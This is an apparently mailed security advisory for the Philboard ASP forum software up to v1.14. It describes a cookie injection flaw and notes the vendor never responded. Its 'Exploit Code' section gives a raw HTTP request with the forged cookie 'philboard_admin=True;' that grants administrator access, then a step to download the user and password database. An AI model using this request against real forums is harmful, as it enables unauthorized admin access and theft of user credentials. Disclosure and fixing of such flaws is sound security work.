Philboard Vulnerability Severity : High (Possible gain administrator/users access on Forum Board) Systems Affected: Philboard up to v1.14 Vendor URL: Vuln Type : Cookie Injection Status : Vendor contacted, fixed version is not available (cause they didn't response) Author : AresU Greetz to : Bosen, Tioeuy, syzwz, Heltz, eF73, SakitJiwa, gembule, muthafuka, and All 1ndonesian Security Team (1st) Summary ======= Philboard is freeware forum application under ASP Scripts. Vulnerable script is on cookie management, all most script is vulnerable for cookie injection. The cookies are "philboard_admin=True;" or "admin=True;" Acknowledgments =============== Vulnerability discovery and advisory by AresU Vendor Response =============== Vendor has contacted and fixed version is not available (cause they didn't reponse) To Fix the script, you must change every cookie command in to session command. Exploit Code ============ 1) Login Administrator Forum: Use your telnet and open target on port 80 GET /board/philboard_admin.asp HTTP/1.0 Host: Cookie: philboard_admin=True; 2) Download the database (users and password): Usually, the database location can be found and download it from: or ----------------------------------------------- This mail sent through